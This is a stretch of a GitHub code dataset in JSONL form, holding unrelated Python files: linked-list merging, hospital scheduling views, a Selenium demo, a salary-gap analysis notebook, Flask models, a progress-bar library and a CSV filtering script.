python_requires='>=3.6',\n)\n","repo_name":"4006G2/AutoMod","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"21201270814","text":"# We iterate trough the lists at the same time\n# reusing nodes and placing them in the correct sorte order\n# Time: O(n+m)\n# Space: O(1) as we reuse nodes\n\nclass ListNode:\n def __init__(self, data = 0, next_node = None):\n self.data = data\n self.next = next_node\n\ndef merge_two_sorted_lists(L1, L2):\n # Create a dummy placeholder\n dummy_head = tail = ListNode()\n\n while L1 and L2:\n if L1.data < L2.data:\n tail.next, L1 = L1, L1.next\n else:\n tail.next, L2 = L2, L2.next\n\n tail = tail.next\n\n# Append remaining nodes of L1 or L2\n tail.next = L1 or L2\n return dummy_head.next","repo_name":"pablomdd/EPI","sub_path":"Linked_Lists/7_1_merge_two_sorted_linked_lists.py","file_name":"7_1_merge_two_sorted_linked_lists.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"15376691890","text":"import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom doctor_schedule.models import ScheduleResource\n\nfrom laboratory.utils import current_time\nfrom doctor_schedule.sql_func import get_resource_by_research_hospital, get_slot_plan_by_hosp_resource, get_hospital_resource_by_research, get_slot_fact\nfrom doctor_schedule.sql_func import get_date_slots_for_many_resource\nfrom laboratory.settings import FORWARD_DAYS_SCHEDULE\nfrom plans.models import PlanHospitalization\nfrom utils.dates import try_strptime\n\n\ndef get_hospital_resource():\n hospital_resource = get_resource_by_research_hospital()\n hospital_resource_pk = [i.scheduleresource_id for i in hospital_resource]\n resource_researches = {}\n for i in hospital_resource:\n if not resource_researches.get(i.scheduleresource_id, None):\n resource_researches[i.scheduleresource_id] = {\"researches_id\": i.researches_id, \"title\": i.schedule_title or i.title, \"short_title\": i.short_title}\n\n d1 = current_time(only_date=True)\n d2 = d1 + relativedelta(days=FORWARD_DAYS_SCHEDULE)\n date_start = datetime.datetime.combine(d1, datetime.time.min)\n date_end = datetime.datetime.combine(d2, datetime.time.max)\n slot_plan_for_hospital = get_slot_plan_by_hosp_resource(date_start, date_end, tuple(hospital_resource_pk))\n resource_has_slot = set([sl.resource_id for sl in slot_plan_for_hospital])\n final_hosp_researches_has_slot = []\n for rslot in resource_has_slot:\n if resource_researches.get(rslot):\n temp_data = resource_researches.get(rslot)\n temp_data[\"resource_id\"] = rslot\n final_hosp_researches_has_slot.append(temp_data.copy())\n\n return final_hosp_researches_has_slot\n\n\ndef get_available_hospital_plans(research_pk, resource_id=None, date_start=None, date_end=None):\n if date_start and date_end:\n d1 = try_strptime(f\"{date_start}\", formats=('%Y-%m-%d',))\n d2 = try_strptime(f\"{date_end}\", formats=('%Y-%m-%d',))\n else:\n d1 = current_time(only_date=True) + relativedelta(days=1)\n d2 = d1 + relativedelta(days=FORWARD_DAYS_SCHEDULE)\n\n if resource_id is None:\n resource_id = tuple(ScheduleResource.objects.filter(service__in=[research_pk]).values_list('pk', flat=True))\n elif isinstance(resource_id, tuple):\n resource_id = resource_id\n elif isinstance(resource_id, list):\n resource_id = tuple(resource_id)\n else:\n resource_id = tuple([resource_id])\n\n if not resource_id:\n return {}, {}\n\n counts = {}\n\n start_date = datetime.datetime.combine(d1, datetime.time.min)\n end_date = datetime.datetime.combine(d2, datetime.time.max)\n result_slot = get_slot_plan_by_hosp_resource(start_date, end_date, resource_id)\n date_slots = {}\n for rslots in result_slot:\n if not date_slots.get(rslots.date_char, None):\n date_slots[rslots.date_char] = [rslots.datetime]\n else:\n temp_date_slots = date_slots.get(rslots.date_char, None)\n temp_date_slots.append(rslots.datetime)\n date_slots[rslots.date_char] = temp_date_slots.copy()\n date_available_status = {}\n\n date_i = start_date - datetime.timedelta(days=1) # ЦИТО можно записать на сегодня\n while date_i < end_date:\n date_s = date_i.strftime(\"%Y-%m-%d\")\n date_available_status[date_s] = False\n date_i += datetime.timedelta(days=1)\n\n for current_date, slots_in_date in date_slots.items():\n d1 = try_strptime(current_date, formats=('%Y-%m-%d',))\n start_date = datetime.datetime.combine(d1, datetime.time.min)\n end_date = datetime.datetime.combine(d1, datetime.time.max)\n current_plan_count = (\n PlanHospitalization.objects.filter(exec_at__range=(start_date, end_date), work_status__in=[0, 1, 3], action=0, research_id=research_pk).order_by(\"exec_at\").count()\n )\n counts[current_date] = {\n \"available\": len(slots_in_date),\n \"used\": current_plan_count,\n }\n date_available_status[current_date] = counts[current_date][\"available\"] > counts[current_date][\"used\"]\n\n return date_available_status, counts\n\n\ndef check_available_hospital_slot_before_save(research_pk, resource_id, date):\n if not research_pk or not date:\n return False\n d = try_strptime(f\"{date}\", formats=('%Y-%m-%d',))\n start_date = datetime.datetime.combine(d, datetime.time.min)\n end_date = datetime.datetime.combine(d, datetime.time.max)\n if resource_id is None:\n resource_id = tuple(ScheduleResource.objects.filter(service__in=[research_pk]).values_list('pk', flat=True))\n elif isinstance(resource_id, tuple):\n resource_id = resource_id\n elif isinstance(resource_id, list):\n resource_id = tuple(resource_id)\n else:\n resource_id = tuple([resource_id])\n\n if not resource_id:\n return False\n\n result_slot = get_slot_plan_by_hosp_resource(start_date, end_date, resource_id)\n date_slots = [i.hhmm_char for i in result_slot]\n current_plan_count = PlanHospitalization.objects.filter(exec_at__range=(start_date, end_date), work_status=0, action=0, research_id=research_pk).order_by(\"exec_at\").count()\n return len(date_slots) > current_plan_count\n\n\ndef get_available_hospital_resource_slot(research_pk, date_start, date_end, allow_cito=False):\n d1 = try_strptime(f\"{date_start}\", formats=('%Y-%m-%d',))\n d2 = try_strptime(f\"{date_end}\", formats=('%Y-%m-%d',))\n start_date = datetime.datetime.combine(d1, datetime.time.min)\n end_date = datetime.datetime.combine(d2, datetime.time.max)\n result = {\"dates\": {}}\n\n if end_date < datetime.datetime.combine(try_strptime(current_time().strftime(\"%Y-%m-%d\"), formats=('%Y-%m-%d',)), datetime.time.max):\n return result\n\n resource_hosp = get_hospital_resource_by_research(research_pk)\n structure_resource = {rh.scheduleresource_id: rh.resource_title for rh in resource_hosp}\n\n resource_tuple = tuple(structure_resource.keys())\n slot_plans = get_date_slots_for_many_resource(start_date, end_date, resource_tuple)\n slot_plan_pks = tuple([slplan.slot_id for slplan in slot_plans])\n slot_plan_busy_slot_fact = get_slot_fact(slot_plan_pks)\n slot_plan_busy_slot_fact = [i.plan_id for i in slot_plan_busy_slot_fact]\n data = result[\"dates\"]\n dates = set([slotplan.date_char for slotplan in slot_plans])\n for d in dates:\n data[d] = []\n\n temp_data_slot_resource = {}\n for slotplan in slot_plans:\n if slotplan.slot_id in slot_plan_busy_slot_fact:\n continue\n if not temp_data_slot_resource.get(slotplan.resource_id):\n temp_data_slot_resource[slotplan.resource_id] = {slotplan.date_char: [{\"pk\": slotplan.slot_id, \"title\": f\"{slotplan.start_slot} - {slotplan.end_slot}\"}]}\n else:\n temp_slot_resource_date = temp_data_slot_resource.get(slotplan.resource_id, None)\n if not temp_slot_resource_date.get(slotplan.date_char):\n temp_slot_resource_date[slotplan.date_char] = [{\"pk\": slotplan.slot_id, \"title\": f\"{slotplan.start_slot} - {slotplan.end_slot}\"}]\n else:\n temp_slot_resource_data = temp_slot_resource_date.get(slotplan.date_char)\n temp_slot_resource_data.append({\"pk\": slotplan.slot_id, \"title\": f\"{slotplan.start_slot} - {slotplan.end_slot}\"})\n temp_slot_resource_date[slotplan.date_char] = temp_slot_resource_data.copy()\n temp_data_slot_resource[slotplan.resource_id] = temp_slot_resource_date.copy()\n\n for k, v in temp_data_slot_resource.items():\n for date, slots in v.items():\n temp_data = data.get(date)\n temp_data.append({\"resourcePk\": k, \"resourceTitle\": structure_resource.get(k, \"\"), \"slots\": slots})\n data[date] = temp_data.copy()\n\n if allow_cito:\n dates = []\n date_i = start_date\n while date_i < end_date:\n date = date_i.strftime(\"%Y-%m-%d\")\n if date not in data:\n data[date] = []\n has_resources = {x['resourcePk']: x for x in data[date]}\n for rpk in resource_tuple:\n if rpk in has_resources:\n has_resources[rpk]['slots'].append({\"pk\": -10, \"title\": \"CITO\"})\n continue\n temp_data = {\"resourcePk\": rpk, \"resourceTitle\": structure_resource.get(rpk, \"\"), \"slots\": [{\"pk\": -10, \"title\": \"CITO\"}]}\n data[date].append(temp_data)\n\n date_i += datetime.timedelta(days=1)\n return result\n\n\ndef get_available_slots_of_dates(research_pk, date_start, date_end, allow_cito=False):\n d1 = try_strptime(f\"{date_start}\", formats=('%Y-%m-%d',))\n d2 = try_strptime(f\"{date_end}\", formats=('%Y-%m-%d',))\n current_date = try_strptime(current_time().strftime(\"%Y-%m-%d\"), formats=('%Y-%m-%d',))\n start_date = datetime.datetime.combine(d1, datetime.time.min)\n end_date = datetime.datetime.combine(d2, datetime.time.max)\n\n if end_date < datetime.datetime.combine(current_date, datetime.time.max):\n return {}\n\n if start_date < datetime.datetime.combine(current_date, datetime.time.min):\n start_date = datetime.datetime.combine(current_date, datetime.time.min) + datetime.timedelta(days=1)\n\n if allow_cito:\n data = {}\n date_i = start_date - datetime.timedelta(days=1) # ЦИТО можно записать на сегодня\n while date_i < end_date:\n date_s = date_i.strftime(\"%Y-%m-%d\")\n data[date_s] = True\n date_i += datetime.timedelta(days=1)\n return data\n\n resource_hosp = get_hospital_resource_by_research(research_pk)\n structure_resource = {rh.scheduleresource_id: rh.resource_title for rh in resource_hosp}\n\n resource_tuple = tuple(structure_resource.keys())\n slot_plans = get_date_slots_for_many_resource(start_date, end_date, resource_tuple)\n slot_plan_pks = tuple([slplan.slot_id for slplan in slot_plans])\n slot_plan_busy_slot_fact = get_slot_fact(slot_plan_pks)\n slot_plan_busy_slot_fact = [i.plan_id for i in slot_plan_busy_slot_fact]\n data = {}\n\n for slotplan in slot_plans:\n if slotplan.slot_id in slot_plan_busy_slot_fact or slotplan.date_char in data:\n continue\n data[slotplan.date_char] = True\n\n return data\n","repo_name":"moodpulse/l2","sub_path":"doctor_schedule/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10362,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"4"} +{"seq_id":"12987955687","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\n\nclass SelectById():\n def locate_by_id(self):\n driver = webdriver.Chrome()\n driver.get('https://facebook.com')\n\n h2 = driver.find_element(By.TAG_NAME, 'h2')\n print(h2.text)\n\n # lista = driver.find_elements(By.TAG_NAME, 'a')\n # for i in lista:\n # print(i.text)\n\n # driver.current_url\n # driver.back back to previous page\n # driver.forward() back to next page\n # driver.refresh() ref page\n # driver.title\n # driver.get()\n # driver.maximize_window()\n # driver.minimize_window()\n # driver.fullscreen_window() F11\n # driver.close() only one tab\n # driver.quit() whole browser\n time.sleep(500)\n\nfindbyid = SelectById()\nfindbyid.locate_by_id()","repo_name":"hardcoregor/python-learn","sub_path":"2nd lesson Big Course/2.functionsSelenium.py","file_name":"2.functionsSelenium.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"74284313075","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Remuneração líquida média mensal no Executivo civil federal ativo, por sexo e raça (1999-2020)\n# \n#
\n# \n# \n\n# ### Descrição da base de dados\n# Neste documento, encontra-se dados que constam a média mensal da remuneração líquida de servidores públicos ativos no Executivo Civil Federal. Os 88 (Oitenta e oito) indivíduos inclusos nesta pesquisa, que consta dados entre os anos 1999 e 2020, estão classificados em dois parâmetros: Sexo e Raça. \n# As características supracitadas serão estudadas posteriormente para auxiliar numa análise exploratória desses dados.\n# Fonte: https://www.ipea.gov.br/atlasestado/filtros-series/28/vinculos-e-remuneracoes-por-sexo\n# \n# \n\n# ## Definição dos dados\n#
\n\n# Primeiramente, é preciso importar as bibliotecas do Python que serão úteis desde a organização dos dados até a análise dos dados com auxílio de gráficos, como Pandas, NumPy, Matplotlib e Seaborn. \n# \n# Assim, logo usa-se o Pandas ('pd') para a leitura em DataFrame do arquivo a ser analisado.\n\n# In[2]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nget_ipython().run_line_magic('matplotlib', 'inline')\ndata = pd.read_csv('5233-liquidosexoraca (1).csv', sep=';', quotechar = '\"', encoding= 'utf8')\ndata\n\n\n# In[3]:\n\n\n# Para melhor visualização adiante, retirei a primeira coluna\ndata = data[['ano', 'sexo_raça', 'liquido']]\ndata.head()\n\n\n# In[17]:\n\n\ndata.head() #Esse comando é usado para ver apenas o início dos DataFrames\n\n\n# ### Dicionário de dados\n# A seguir, consta um dicionário de dados, no qual há um DataFrame nomeado como \"dicionario\" que contém as variáveis e seus respectivos nomes, descrições e classificações com o intuito de elucidar o que está contido dentro do dataset a ser analisado. O objetivo principal é prover um melhor entendimento sobre os dados fornecidos.\n\n# In[18]:\n\n\n\ndicionario = {'Nome da variável' : [ 'Ano', 'Sexo e Raça', 'Salário Liquido'],\n 'Tipo de variavel' : ['Numérico', 'Nominal','Numérico'],\n 'Descrição da variável' : ['Ano da coleta', 'Sexo e Raça do indivíduo', 'Salário liquido mensal do indivíduo']\n }\ndicionario = pd.DataFrame(data = dicionario)\ndicionario\n\n\n# ## Preparação dos dados\n#
\n# \n# Nesta etapa, os dados devem ser bem organizados e limpos, ou seja, será feito a eliminação de duplicações ou outliers e de valores ausentes.\n# \n# A seguir foi utilizado um recurso do Pandas que remove os valores nulos, ou seja, os valores ausentes do DataFrame. Esses valores são nomeados como 'NaN' (Not a Number).\n\n# In[19]:\n\n\ndata.isnull()\n\n\n# Ao executar essa função, verifica-se os dados nulos em cada coluna. Assim, ao ver o valor booleano \"False\" quer dizer que há dados atribuidos, se houver \"True\", não há dados.\n\n# In[20]:\n\n\ndata.isnull().sum() #Aqui, conta-se a quantidade de números ausentes\n\n\n# Portanto, vemos que não há valores ausentes nas colunas.\n\n# In[21]:\n\n\ndata.duplicated() \n#Para verificar se há dados duplicados, se houver algum dado duplicado, aparecerá \"True\".\n\n\n# In[22]:\n\n\ndata = data.dropna() \ndata\n\n\n# Vemos que não há dados duplicados. Assim, com dados limpos, seguimos para a análise desses dados.\n\n# # Análise exploratória de dados\n#
\n# \n\n# \n# \n# ### Há alguma discrepância na remuneração mensal quando compara-se a média salarial de cada grupo?\n# \n\n# In[39]:\n\n\ndata.head()\n\n\n# In[24]:\n\n\ndata.info()\n\n\n# Ao verificar os tipos de cada variável nas colunas, vemos que 'sexo_raça' e 'liquido' são lidas como objetos. No entanto, a variável 'liquido' precisa ser reocnhecida como um tipo numérico com casa decimal, para que a analise a ser feita não seja prejudicada. \n\n# In[6]:\n\n\ndata['liquido'] = data['liquido'].str.replace(',','.').astype(float)\n\n\n# In[7]:\n\n\ndata.info()\n\n\n# A seguir, iremos juntar todos os dados contido nos 4 tipos de 'sexo_raça' classificados e observar, em média, a remuneração de cada um. \n\n# In[9]:\n\n\nA1 = data.groupby(['sexo_raça'])['liquido'].mean().reset_index()\nA1['liquido'] = round(A1['liquido'],2) \nA1\n\n\n# In[18]:\n\n\n#Com os dados obtidos, será gerado um gráfico\nf, ax1 = plt.subplots(figsize=(7, 5))\nax1 = sns.barplot(data = A1 ,x= 'sexo_raça', y='liquido')\nplt.xlabel('Raça e Sexo', color = 'darkblue', size = 15)\nplt.ylabel('Remuneração Média (Real)', color = 'darkblue', size = 15)\nplt.title('Remuneração Média (Real) de invidívuos do setor público tendo como parâmetro Raça e Sexo ', size = 20)\n\n\n# Observa-se que a média salarial entre os indivíduos acima, de acordo com tais parâmetros (Raça e Sexo), entre os anos 1999 e 2000, evidencia-se que homens brancos possuem, com uma grande vantagem, uma média salarial maior em relação aos demais.\n# Vemos que há uma discrepância bastante significativa quando se compara a média salarial de homens brancos com a de mulheres negras. Está exposto que mesmo havendo mulheres negras capazes de exercer funções no mesmo cargo que um homem branco, o mercado de trabalho as subestima. Assim como o gênero é visto explicitamente como um fator não favorável, a raça também é um outro paramâmetro a se considerar, pois vemos que mesmo sendo homem, a média salarial de homems negros é surpreendentemente menor que a de mulheres brancas.\n# \n# \n# A cultura machista e racista afeta uma grande parcela da população que não se encaixa nos padrões historicamente instaurados na nossa sociedade, observamos frequentemente como a desigualdade entre raça e gênero podem ser um aspecto que determina como essas pessoas vão ser inseridas no mercado de trabalho, quais cargos ocuparam e quais serão seus salários. Esses fatores de discriminação são vistos quando a participação de homens brancos no mercado de trabalho é elevado em comparação com a atuação de mulheres, e quando comparados a homens e mulheres negras essa diferença se destaca ainda mais. Por isso, os dados são importantes para comprovar que a reprodução de tais aos racistas e sexistas.\n# \n# \n# No Brasil, as desigualdades de gênero e raça não são fenômenos que estão referidos a \"minorias\" ou a grupos específicos da sociedade. Pelo contrário, são problemas que dizem respeito às grandes maiorias da população: segundo os dados da Pesquisa Nacional por Amostra de Domicílios (PNAD) 2003, as mulheres representam 43% da População Economicamente Ativa (PEA) no Brasil e os negros (de ambos os sexos) representam 46%. Somados, correspondem a aproximadamente 70% da PEA (60 milhões de pessoas). As mulheres negras, por sua vez, correspondem a mais de 15 milhões de pessoas (18% da PEA) e, como resultado de uma dupla discriminação (de gênero e raça), apresentam uma situação de sistemática desvantagem em todos os principais indicadores sociais e de mercado de trabalho (ABRAMO, LAÍS 2006).\n# \n\n# ### A tendência ao longo dos anos entre indivíduos de sexo e raça distintas\n# \n\n# In[87]:\n\n\ndata.head()\n\n\n# In[24]:\n\n\nhomembranco = data.loc[data['sexo_raça']== 'Homem Branco']\n\n\n# In[50]:\n\n\nhomembranco #separando em um dataframe todos os dados referentes aos homens brancos\n\n\n# In[20]:\n\n\nmulhernegra = data.loc[data['sexo_raça']== 'Mulher Negra']\n\n\n# In[51]:\n\n\nmulhernegra #separando em um dataframe todos os dados referente as mulheres negras\n\n\n# In[82]:\n\n\nmulhernegra.plot(x = \"ano\", y = \"liquido\",\n grid = True,\n legend = True, label = 'Remuneração em R$',\n marker = \".\",\n markersize = 5,\n colormap = \"viridis\",\n xlabel = \"Anos\", color= 'darkgreen',\n ylabel= \"Remuneração em Real\",\n title = \"Salário de Mulheres negras entre 1999 e 2020\")\n\n\n# In[79]:\n\n\nhomembranco.plot(x = \"ano\", y = \"liquido\",\n grid = True,\n legend = True, label = 'Remuneração em R$',\n marker = \".\", \n color= 'red',\n markersize = 5, \n xlabel = \"Anos\", \n ylabel= \"Remuneração em Real\",\n title = \"Salário de Homens brancos entre 1999 e 2020\")\n\n\n# No ambiente executivo civil federal, no intervalo de anos 2004-2015 houve um pico de aumento salarial para mulheres negras e homens brancos, entretanto, o gráfico ainda nos mostra que a desigualdade salarial permanece. O homem passou a ganhar cada vez mais, resultando posteriormente, em 2020, em um salário acima de R$8.500,00, enquanto as mulheres negras não possuem uma remuneração acima de R$6.000,00\n# \n# De acordo com o MEC, em 2004, surgiu um projeto para a implementação de cotas e em 2012, a lei foi sancionada. Isso explica o pico entre os anos supracitados e, assim, foi possibilitado a entrada de pessoas negras na universidade, o que contribuiu para o aumento dos salários de todos, incluindo as mulheres negras.\n# \n# Isso mostra que mesmo tendo quase 10 anos de políticas afirmativas, viabilizando que pessoas negras estejam ocupando espaços, os quais antes a maioria composta por homens brancos, não foi suficiente para reparar historicamente a desigualdade de gênero e, principalmente, raça. Por fim, mostra-se que cada vez mais temos que lutar para que políticas no mercado de trabalho sejam criadas para que essa discrepância na remuneração salarial diminua e ocorra mudanças efetivas.\n# \n# \n# Fonte: http://portal.mec.gov.br/component/tags/tag/politica-de-cotas\n","repo_name":"AnaSBrandao/Remunera-o-l-quida-m-dia-mensal-no-Executivo-civil-federal-ativo-por-sexo-e-ra-a-1999-2020-","sub_path":"Remuneração líquida média mensal no Executivo civil federal ativo, por sexo e raça (1999-2020).py","file_name":"Remuneração líquida média mensal no Executivo civil federal ativo, por sexo e raça (1999-2020).py","file_ext":"py","file_size_in_byte":9555,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"29190621927","text":"from flask_migrate import Migrate\nimport datetime\nfrom sqlalchemy import Column, String, Integer, DateTime, ForeignKey\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.orm import relationship, backref\nimport timeago\ndb = SQLAlchemy()\nnow = datetime.datetime.now() + datetime.timedelta(seconds=60 * 3.4)\n\n'''\nsetup_db(app)\n binds a flask application and a SQLAlchemy service\n'''\n\n\ndef setup_db(app):\n app.config.from_object('config')\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n db.app = app\n Migrate(app, db)\n db.init_app(app)\n db.create_all()\n\n\n'''\nWorkout\n\n'''\n\n\nclass Workout(db.Model):\n __tablename__ = 'workouts'\n\n id = Column(Integer, primary_key=True)\n type = Column(String)\n icon = Column(String)\n totalTime = Column(String)\n totalCal = Column(String)\n activeCal = Column(Integer)\n heart = Column(Integer)\n created_at = Column(DateTime, default=datetime.datetime.utcnow)\n\n def __init__(self, type, icon, totalTime, totalCal, activeCal, heart, created_at):\n self.type = type\n self.icon = icon\n self.totalTime = totalTime\n self.totalCal = totalCal\n self.activeCal = activeCal\n self.heart = heart\n self.created_at = created_at\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n 'id': self.id,\n 'type': self.type,\n 'icon': self.icon,\n 'totalTime': self.totalTime,\n 'totalCal': self.totalCal,\n 'activeCal': self.activeCal,\n 'heart': self.heart,\n 'created_at': timeago.format(self.created_at, now)\n }\n\n\n\n\n\n\n\n\n'''\nUser\n\n'''\n\n\nclass User(db.Model):\n __tablename__ = 'users'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n dob = Column(DateTime, default=datetime.datetime.utcnow)\n blod = Column(String)\n health = Column(String)\n water = Column(String)\n moveGoal = Column(Integer)\n excersiceGoal = Column(Integer)\n standGoal = Column(Integer)\n\n\n def __init__(self, name, dob, blod, health, water, moveGoal, excersiceGoal, standGoal):\n self.name = name\n self.dob = dob\n self.blod = blod\n self.health = health\n self.water = water\n self.moveGoal = moveGoal\n self.excersiceGoal = excersiceGoal\n self.standGoal = standGoal\n\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n\n def format(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'blod': self.blod,\n 'health': self.health,\n 'water': self.water,\n 'moveGoal': self.moveGoal,\n 'excersiceGoal': self.excersiceGoal,\n 'standGoal': self.standGoal,\n }\n","repo_name":"iMishaDev/udacity-activities","sub_path":"flask-sqlalchemy-activity/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"4"} +{"seq_id":"38897411675","text":"mi_conjunto = {1, 2, 3}\n\n# Agregar elementos al conjunto\n\nmi_conjunto.add(4)\nprint(mi_conjunto) # Output: {1, 2, 3, 4}\n\n# Eliminar elementos del conjunto\nmi_conjunto.remove(2)\nprint(mi_conjunto) # Output: {1, 3, 4}\n\nconjunto1 = {1, 2, 3}\nconjunto2 = {3, 4, 5}\n\n# Unión de conjuntos\nunion = conjunto1.union(conjunto2)\nprint(union) # Output: {1, 2, 3, 4, 5}\n\n# Intersección de conjuntos\ninterseccion = conjunto1.intersection(conjunto2)\nprint(interseccion) # Output: {3}\n\n# Diferencia de conjuntos\ndiferencia = conjunto1.difference(conjunto2)\nprint(diferencia) # Output: {1, 2}\n","repo_name":"JPalacio3/Escuela_Desarrollo_de_Software_Basico.","sub_path":"PYTHON/03-ESTRUCTURAS DE CONTROL/conjuntos.py","file_name":"conjuntos.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"4162692453","text":"\"\"\"\nDescription: higher api for pb (progress bar).py\nversion:\nAuthor: TianyuYuan\nDate: 2021-03-26 13:44:18\nLastEditors: TianyuYuan\nLastEditTime: 2021-04-06 21:20:09\n\"\"\"\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom functools import partial\nfrom tykit.progressbar import ProgressBar\n\n\n# * * * * * * * * * * * * * * * * * * * * * * * #\n# * Higher API for progressbar * #\n# * * * * * * * * * * * * * * * * * * * * * * * #\n\ndef pb_iter(iter_files):\n \"\"\"生成器,将可迭代对象填入,在生成element的同时显示迭代的进度\"\"\"\n pb = ProgressBar(\"iter\", len(iter_files))\n for i,element in enumerate(iter_files):\n pb.print_progressbar(i)\n yield element\n\n\ndef pb_range(*args):\n \"\"\"可显示迭代进度的range(),功能用法与range相同\n \"\"\"\n iter_files = range(*args)\n return pb_iter(iter_files)\n\n\ndef pb_multi_thread(workers: int, task, iter_files) -> list:\n \"\"\"显示多进程进度条\n - workers: 指定多进程的max_workers\n - task: 任务函数\n - iter_files: 填入要处理的可迭代对象\n - return: 返回每个job的结果,并存入list返回\n \"\"\"\n pb = ProgressBar(task, len(iter_files))\n result = []\n with ThreadPoolExecutor(max_workers=workers) as pool:\n job_list = []\n for task_input in iter_files:\n job = pool.submit(task, task_input)\n job_list.append(job)\n i = 0\n for done_job in as_completed(job_list):\n i += 1\n result.append(done_job.result())\n pb.print_progressbar(i)\n return result\n\n\ndef pb_multi_thread_partial(workers: int, task, iter_files, **kwargs):\n \"\"\"显示多进程进度条,针对具有多参数的任务\n - workers: 指定多进程的max_workers\n - task: 任务函数\n - iter_files: 填入要处理的可迭代对象\n - **kwargs: 填入'keyword=constant_object....'\n - return: 返回每个job的结果,并存入list返回\n \"\"\"\n new_task = partial(task, **kwargs)\n new_task.__name__ = task.__name__\n return pb_multi_thread(workers, new_task, iter_files)\n\n\n# ! * * * * * * * * * * * * * * * * * * * * * * #\n# ! Test Cases & Examples * #\n# ! * * * * * * * * * * * * * * * * * * * * * * #\ndef square_a_num(x):\n \"\"\"任务函数\"\"\"\n import time\n time.sleep(0.05)\n return x * x\n\n\ndef multi_param_task(x, a, b, c):\n \"\"\"多参数任务函数\"\"\"\n return x + a + b + c\n\n\ndef pb_range_testcase(*args):\n result = []\n for i in pb_range(*args):\n result.append(square_a_num(i))\n # print(result)\n\n\ndef pb_simple_iter_testcase(x):\n result = []\n for i in pb_iter(range(x)):\n result.append(square_a_num(i))\n # print(result)\n\n\ndef pb_multi_thread_testcase(x):\n iter_files = range(x)\n result = pb_multi_thread(10, square_a_num, iter_files)\n # print(result)\n\n\ndef pb_multi_thread_partial_testcase(x, a, b, c):\n iter_files = range(x)\n result = pb_multi_thread_partial(10, multi_param_task, iter_files, a=a, b=b, c=c)\n # print(result)\n\nif __name__ == \"__main__\":\n from time import sleep\n for i in pb_range(1000):\n sleep(0.01)\n","repo_name":"paperplane110/tykit","sub_path":"tykit/pb_api.py","file_name":"pb_api.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"20958861622","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport csv\nimport os\nimport pandas as pd\nimport numpy as np\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport openpyxl\nimport time\n\n#####################################常用方法###################################\n\n#获取dir路径下的所有文件/文件夹路径\ndef get_filelist(dir):\n\t\tfullnamelist=[]\n\t\tfor home, dirs, files in os.walk(dir):\n\t\t\t\tfor filenamelist in files:\n\t\t\t\t\t\tfullnamelist.append(os.path.join(home, filenamelist))\n\t\treturn fullnamelist\n\n#####################################常用方法###################################\n\nif __name__ == \"__main__\":\n\t\tmeta_10=[]\n\t\tlogpath=get_filelist(os.getcwd())\n\t\tcreat_file= os.path.join(os.getcwd()+\"\\\\output\")\n\t\tprint(os.path.exists(creat_file))\n\t\tif os.path.exists(creat_file) == False:\t\n\t\t\tos.makedirs(creat_file,exist_ok=True)#当 exists_ok=False 时,若目录已存在,报 FileExistsError:当文件已存在时,无法创建该文件,exists_ok=True 时,不会报错。\n\t\tprint(logpath)\n\t\tfor i in range(len(logpath)):\n\t\t\tif \".csv\" in logpath[i] and \"IMEI.csv\" not in logpath[i] and \"result\" not in logpath[i]:\n\t\t\t\tprint(\"解析文件路径:\",logpath[i])\n\t\t\t\tdf1 = pd.read_csv(logpath[i],encoding='gbk')\n\t\t\t\tdf2 = pd.read_csv('IMEI.csv')\n\t\t\t\tsave_path=os.path.join(creat_file,\"result.csv\")\n\t\t\t\tprint(save_path)\n\t\t\t\tdistname=open(save_path,'w',newline ='') #newline 参数解决保存时中间空了一行的问题\n\t\t\t\tidx_for_df1 = df1['imei'].isin(df2['imei'])\n\t\t\t\tprint(len(idx_for_df1))\n\t\t\t\tfor x in range(len(idx_for_df1)):\n\t\t\t\t\tif idx_for_df1[x]==True:\n\t\t\t\t\t\t#print(\"x:\" + str(x) +\" \"+ str(idx_for_df1[x]))\n\t\t\t\t\t\t#print(df1.iloc[x,:])\n\t\t\t\t\t\tmeta_10.append(df1.iloc[x,:])#将满足条件的行加入到列表中\n\t\t\t\tpd_10=pd.DataFrame(meta_10)#将列表转换为DataFrame格式\n\t\t\t\tpd_10.to_csv(distname,index=None)\n\n\t\n\n\n\n\n\n\n","repo_name":"Wayne20200520/PythonProject","sub_path":"power/埋点处理脚本/提取指定IMEI号电流信息/power_log_collect.py","file_name":"power_log_collect.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"36972388495","text":"from telegram.client import Telegram\nfrom config import api_id, 